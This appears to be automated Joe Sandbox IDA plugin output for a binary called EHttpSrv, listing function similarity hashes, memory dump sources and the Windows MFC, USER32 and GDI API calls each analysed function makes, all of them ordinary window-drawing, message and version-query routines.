                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#1176
                                                                                                                • String ID:
                                                                                                                • API String ID: 987861311-0
                                                                                                                • Opcode ID: 20e9d8c626773fd68c79db1f578be4406d3d27dbf94b22d3dc0e594d28f61c13
                                                                                                                • Instruction ID: 65ffa9f82092dabdcb5bed94917da9e578248e28c1d1eeaeeb7bb9fc897bd46c
                                                                                                                • Opcode Fuzzy Hash: 20e9d8c626773fd68c79db1f578be4406d3d27dbf94b22d3dc0e594d28f61c13
                                                                                                                • Instruction Fuzzy Hash: 523141F2700B418FC720DFD9D8D192BB7E5BF68604794892DE28A87A60C635F884CB51
                                                                                                                APIs
                                                                                                                • #764.MFC80U(00000000,?,20411B81,00000000), ref: 20411695
                                                                                                                • #764.MFC80U(FF000002,?,20411B81,00000000), ref: 204116AC
                                                                                                                • #265.MFC80U(00000000,?,20462D01,?,20411B81,00000000), ref: 204116E9
                                                                                                                • #265.MFC80U(00000000,?,20462D01,?,20411B81,00000000), ref: 20411746
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID:
                                                                                                                • API String ID: 2915978212-0
                                                                                                                • Opcode ID: ba2e8e614aacfb2c1cfc17631be87df5023eeda68792fc49645a80e1b67e0cd6
                                                                                                                • Instruction ID: 7a5158a3ee04ab6488e1a237766dc88d7216dad2747c0f1574a6556f2305acef
                                                                                                                • Opcode Fuzzy Hash: ba2e8e614aacfb2c1cfc17631be87df5023eeda68792fc49645a80e1b67e0cd6
                                                                                                                • Instruction Fuzzy Hash: 1F2173766002008BDB189F64CD567AB73A5EF84694F49C52CDD0A8F7A4E73AFE05C680
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 20444DA6
                                                                                                                • #2461.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,2047DED8,000000FF), ref: 20444DE9
                                                                                                                • #2461.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,2047DED8), ref: 20444E54
                                                                                                                • #6751.MFC80U(00000000,?), ref: 20444E8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2461$#314#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 931018407-0
                                                                                                                • Opcode ID: 26d87b569da9c3e50e22f2a10a356677a855cf05579aeb297ba1f5042db95ef0
                                                                                                                • Instruction ID: 76b2dcf8fe44664dc88a3af28260734e3798ef99fca1d7f944336e42d88328c0
                                                                                                                • Opcode Fuzzy Hash: 26d87b569da9c3e50e22f2a10a356677a855cf05579aeb297ba1f5042db95ef0
                                                                                                                • Instruction Fuzzy Hash: FA318D31A087008FE310DFA4C885B9AB7E4FBA5768F60CA1DE855577E0DB39E905CB81
                                                                                                                APIs
                                                                                                                • #1894.MFC80U ref: 20433DEE
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 204317F9
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 20431806
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 20431813
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433E9D
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433EAA
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433EB7
                                                                                                                  • Part of subcall function 20433ED0: InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433F37
                                                                                                                  • Part of subcall function 20433ED0: InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433F44
                                                                                                                  • Part of subcall function 20433ED0: InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Invalidate$#1894
                                                                                                                • String ID:
                                                                                                                • API String ID: 3887639419-0
                                                                                                                • Opcode ID: e815c2661e558f242e4c03c4ff3a68e1085abd3e151ac4e0b690b076e2d82447
                                                                                                                • Instruction ID: 669572870b13d328d3c28b5ce8d592afa34f028504738166e2341f06c687eada
                                                                                                                • Opcode Fuzzy Hash: e815c2661e558f242e4c03c4ff3a68e1085abd3e151ac4e0b690b076e2d82447
                                                                                                                • Instruction Fuzzy Hash: C22132722047046BD310DBA4CC92F6BB3E9FBD8719F108A1DF695872D0DBB5E9058B91
                                                                                                                APIs
                                                                                                                • #354.MFC80U(000000B2,?,FEEA6C22,?,00000000,2047D512,000000FF,20470A25,00000000,?,?,?,?), ref: 204758E1
                                                                                                                • #563.MFC80U(000000B2,?,FEEA6C22,?,00000000,2047D512,000000FF,20470A25,00000000,?,?,?,?), ref: 2047593A
                                                                                                                  • Part of subcall function 2045CF80: #530.MFC80U(FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22,?,?,?,2047BED4), ref: 2045CFB1
                                                                                                                  • Part of subcall function 2045CF80: #6003.MFC80U(00000000,000000FF,FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22), ref: 2045CFCD
                                                                                                                  • Part of subcall function 20423810: #572.MFC80U(FEEA6C22,20428001,00000000,2047A038,000000FF,20422C5E,20428085,20428001,000000FF,FEEA6C22,?,?,?,2047B870,000000FF,20428001), ref: 20423837
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E0A
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U ref: 20430E17
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E25
                                                                                                                  • Part of subcall function 20430DC0: LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
                                                                                                                  • Part of subcall function 20430DC0: SetRectEmpty.USER32(?), ref: 20430F17
                                                                                                                • #1079.MFC80U(?,?,?,?,?,?,000000B2,?,FEEA6C22,?,00000000,2047D512,000000FF,20470A25,00000000,?), ref: 204759C8
                                                                                                                • LoadAcceleratorsW.USER32(?,00000084), ref: 204759D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#557Load$#1079#354#530#563#572#6003AcceleratorsCursorEmptyRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2898300369-0
                                                                                                                • Opcode ID: 25145885f755b7da27b2183d7801b8a14ebb19caded4335ed2728ef1bae41064
                                                                                                                • Instruction ID: c9898c695ffcc76be56d112311e911471fd38206f09a34854931a16e4d6a0a3e
                                                                                                                • Opcode Fuzzy Hash: 25145885f755b7da27b2183d7801b8a14ebb19caded4335ed2728ef1bae41064
                                                                                                                • Instruction Fuzzy Hash: 1831E8B1508B818FD361CF78C445B9BBBE4BB59718F008E1DE5EAC7251DB78A508CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: mallocmemsetwcscpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 995197152-0
                                                                                                                • Opcode ID: 9c3eb15f5dc6e294465321d57e3f220c202f05c3c8742495f74193d9d1d2d59d
                                                                                                                • Instruction ID: 64582f39a420c492fcb8207987f9435a1f8be2e36599d7ac70da3adc889762b8
                                                                                                                • Opcode Fuzzy Hash: 9c3eb15f5dc6e294465321d57e3f220c202f05c3c8742495f74193d9d1d2d59d
                                                                                                                • Instruction Fuzzy Hash: FC2107B168070057D310DB98CC4BBEB77E4EF98B04F15C82CEA46972A1EABC964487C2
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 204332EF
                                                                                                                • PtInRect.USER32(?,?,?), ref: 20433304
                                                                                                                • ScreenToClient.USER32(?,?), ref: 20433317
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 204317F9
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 20431806
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 20431813
                                                                                                                • #925.MFC80U(?,?,00000000), ref: 20433364
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$#925ClientScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2780130384-0
                                                                                                                • Opcode ID: dc416124104b3f95af4896d9c531a06e60a9371ec363dfeb83695ee6ffca8474
                                                                                                                • Instruction ID: 23278acfa54654be79d7e5eaec57ad399739bda5b89f9b7708fafed77743f82c
                                                                                                                • Opcode Fuzzy Hash: dc416124104b3f95af4896d9c531a06e60a9371ec363dfeb83695ee6ffca8474
                                                                                                                • Instruction Fuzzy Hash: 00116076604205ABD310CF68DC85EABB7ACEBD8725F10CA1EF95887350EB75E81087A1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20421B70: #572.MFC80U(FEEA6C22,?,?,2047A038,000000FF,2042055C,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 20421B97
                                                                                                                • #764.MFC80U(?,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 2042059A
                                                                                                                • #764.MFC80U(?,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 204205BF
                                                                                                                • GetSysColor.USER32(0000000E), ref: 204205E4
                                                                                                                • GetSysColor.USER32(0000000D), ref: 204205EE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764Color$#572
                                                                                                                • String ID:
                                                                                                                • API String ID: 3483561206-0
                                                                                                                • Opcode ID: 2ce00bcb911a0adf78cd9849c7c425dd942b9d041eb1801af834b2b93f52d9de
                                                                                                                • Instruction ID: c3474024772679d4fc8c10b854ff922739a4d7c1715f003fed4a8b73763e614e
                                                                                                                • Opcode Fuzzy Hash: 2ce00bcb911a0adf78cd9849c7c425dd942b9d041eb1801af834b2b93f52d9de
                                                                                                                • Instruction Fuzzy Hash: 1021CAB1905B419FD320CF6AD941B96FBE8FFA0614F108A1FE1A993260D7B9A5048F61
                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION ref: 20410CE5
                                                                                                                • malloc.MSVCR80 ref: 20410CF1
                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?,?,20410C8F), ref: 20410D06
                                                                                                                • VerQueryValueW.VERSION ref: 20410D32
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoVersion$QuerySizeValuemalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1270079192-0
                                                                                                                • Opcode ID: a86856293d64de432b3949596be9cdd879a74fc3581f4e17848ba5143e8bd00a
                                                                                                                • Instruction ID: c8f75003a6e533de741e8816a0542783ade0f3979282a4eae5926f6df052299d
                                                                                                                • Opcode Fuzzy Hash: a86856293d64de432b3949596be9cdd879a74fc3581f4e17848ba5143e8bd00a
                                                                                                                • Instruction Fuzzy Hash: 8201CE711042019BDB10CFA8EC81BAB7BE8AF80654F44842DFD09D7240E778E948C7A2
                                                                                                                APIs
                                                                                                                • #1921.MFC80U(FEEA6C22,00000000,?,?,00000000,2047D9E8,000000FF,20470C23,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B,?), ref: 204613AF
                                                                                                                  • Part of subcall function 20431180: DestroyCursor.USER32(?), ref: 204311C1
                                                                                                                  • Part of subcall function 20431180: #764.MFC80U(?,?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431225
                                                                                                                  • Part of subcall function 20431180: #745.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431235
                                                                                                                  • Part of subcall function 20431180: #578.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431242
                                                                                                                  • Part of subcall function 20431180: #745.MFC80U ref: 20431250
                                                                                                                  • Part of subcall function 20431180: #578.MFC80U ref: 2043125D
                                                                                                                  • Part of subcall function 20431180: #741.MFC80U ref: 2043126D
                                                                                                                  • Part of subcall function 2045D000: free.MSVCR80 ref: 2045D058
                                                                                                                  • Part of subcall function 2045D000: #6003.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D06E
                                                                                                                  • Part of subcall function 2045D000: #722.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D07D
                                                                                                                • #651.MFC80U(FEEA6C22,00000000,?,?,00000000,2047D9E8,000000FF,20470C23,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B,?), ref: 204613EB
                                                                                                                • #658.MFC80U(FEEA6C22,00000000,?,?,00000000,2047D9E8,000000FF,20470C23,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B,?), ref: 204613FB
                                                                                                                • #718.MFC80U(?,00000004,00000002,6C4E60B9,FEEA6C22,00000000,?,?,00000000,2047D9E8,000000FF,20470C23,FEEA6C22,-00003AB4,?,00000000), ref: 20461425
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578#745$#1921#6003#651#658#718#722#741#764CursorDestroyfree
                                                                                                                • String ID:
                                                                                                                • API String ID: 602197399-0
                                                                                                                • Opcode ID: dbbd932bae2c3452bf3c64ad00c1fbe8bfc9d51b218b477bca544865daeb77bf
                                                                                                                • Instruction ID: 119b809bf4f96c5bd9266e20159618770743de9896ef792059788e81e2d00db8
                                                                                                                • Opcode Fuzzy Hash: dbbd932bae2c3452bf3c64ad00c1fbe8bfc9d51b218b477bca544865daeb77bf
                                                                                                                • Instruction Fuzzy Hash: 1311B1701087819AD314DF68C891BABBBE4ABA5758F50C91DF0A5872E1DB78650CC7D2
                                                                                                                APIs
                                                                                                                • #1079.MFC80U(?,76945540,?,204602E5), ref: 20460309
                                                                                                                  • Part of subcall function 20435260: #1079.MFC80U(?,FEEA6C22), ref: 2043529B
                                                                                                                  • Part of subcall function 20435260: #6749.MFC80U(?,?,FEEA6C22), ref: 204352A7
                                                                                                                • #1079.MFC80U(?,-00000001,76945540,?,204602E5), ref: 2046032C
                                                                                                                  • Part of subcall function 20438C80: #1079.MFC80U(?,FEEA6C22), ref: 20438CBB
                                                                                                                  • Part of subcall function 20438C80: #6749.MFC80U(?,?,FEEA6C22), ref: 20438CC7
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 2046035B
                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,0000FFFF), ref: 20460398
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1079$#6749MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3611429224-0
                                                                                                                • Opcode ID: 42af1b52751994337f860d7887d5713359492234ca42d99299fbf78c5578e644
                                                                                                                • Instruction ID: 84401560cff12eddf0e38724ac67850e5e3849c2a06f6b5b4cf76c25a307d55b
                                                                                                                • Opcode Fuzzy Hash: 42af1b52751994337f860d7887d5713359492234ca42d99299fbf78c5578e644
                                                                                                                • Instruction Fuzzy Hash: 14018032B406116BD22487B4C985FABB3A9BF44B49F158268FA0C6B791DB78BC40C7D0
                                                                                                                APIs
                                                                                                                • #1079.MFC80U(?,76945540,00000000,204615CF), ref: 204615F9
                                                                                                                  • Part of subcall function 20435260: #1079.MFC80U(?,FEEA6C22), ref: 2043529B
                                                                                                                  • Part of subcall function 20435260: #6749.MFC80U(?,?,FEEA6C22), ref: 204352A7
                                                                                                                • #1079.MFC80U(?,-00000001,76945540,00000000,204615CF), ref: 2046161C
                                                                                                                  • Part of subcall function 20438C80: #1079.MFC80U(?,FEEA6C22), ref: 20438CBB
                                                                                                                  • Part of subcall function 20438C80: #6749.MFC80U(?,?,FEEA6C22), ref: 20438CC7
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 2046164B
                                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFF), ref: 20461688
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1079$#6749MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3611429224-0
                                                                                                                • Opcode ID: 7a587c9cea0989edabe2cffac45c37636974af111bd2aa4f96ef4d627b3bc468
                                                                                                                • Instruction ID: 742600d1976ab0db29e4d7ae0ad4cb0ff4a5a4958f97b4a84386632c03135728
                                                                                                                • Opcode Fuzzy Hash: 7a587c9cea0989edabe2cffac45c37636974af111bd2aa4f96ef4d627b3bc468
                                                                                                                • Instruction Fuzzy Hash: 11014436B406116BD2248BB4CD85FA6B3A8BF54B48F198568F91C5B6A1DB64AC00C7D0
                                                                                                                APIs
                                                                                                                • #4755.MFC80U(FEEA6C22), ref: 2042FC3D
                                                                                                                • #330.MFC80U ref: 2042FC4D
                                                                                                                • GetClientRect.USER32(?,?), ref: 2042FC63
                                                                                                                  • Part of subcall function 2042FDE0: GetCurrentObject.GDI32(?,00000001), ref: 2042FE0D
                                                                                                                  • Part of subcall function 2042FDE0: #2362.MFC80U(00000000,?,?,?,?,?,?,?,?,?,FEEA6C22), ref: 2042FE14
                                                                                                                  • Part of subcall function 2042FDE0: GetSysColor.USER32(00000008), ref: 2042FE1D
                                                                                                                  • Part of subcall function 2042FDE0: #502.MFC80U(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,FEEA6C22), ref: 2042FE2C
                                                                                                                  • Part of subcall function 2042FDE0: #5638.MFC80U(00000001), ref: 2042FE40
                                                                                                                  • Part of subcall function 2042FDE0: GetObjectW.GDI32(?,00000010,?), ref: 2042FE50
                                                                                                                  • Part of subcall function 2042FDE0: SetPixel.GDI32(?,?,?,?), ref: 2042FE88
                                                                                                                  • Part of subcall function 2042FDE0: #4117.MFC80U(?,?,?), ref: 2042FE9D
                                                                                                                  • Part of subcall function 2042FDE0: #3995.MFC80U(?,?,?,?,?), ref: 2042FEAF
                                                                                                                  • Part of subcall function 2042FDE0: #4117.MFC80U(?,?,?,?,?,?,?,?), ref: 2042FEC3
                                                                                                                  • Part of subcall function 2042FDE0: #3995.MFC80U(?,?,?,?,?,?,?,?,?,?), ref: 2042FED5
                                                                                                                  • Part of subcall function 2042FDE0: #4117.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 2042FEE9
                                                                                                                  • Part of subcall function 2042FCB0: CopyRect.USER32(?,?), ref: 2042FCE3
                                                                                                                  • Part of subcall function 2042FCB0: GetSysColor.USER32(00000010), ref: 2042FD0A
                                                                                                                  • Part of subcall function 2042FCB0: #502.MFC80U(00000000,00000001,00000000,?,?,?,?), ref: 2042FD19
                                                                                                                  • Part of subcall function 2042FCB0: #5638.MFC80U(?), ref: 2042FD2D
                                                                                                                  • Part of subcall function 2042FCB0: #4117.MFC80U(?,?,?,?), ref: 2042FD3B
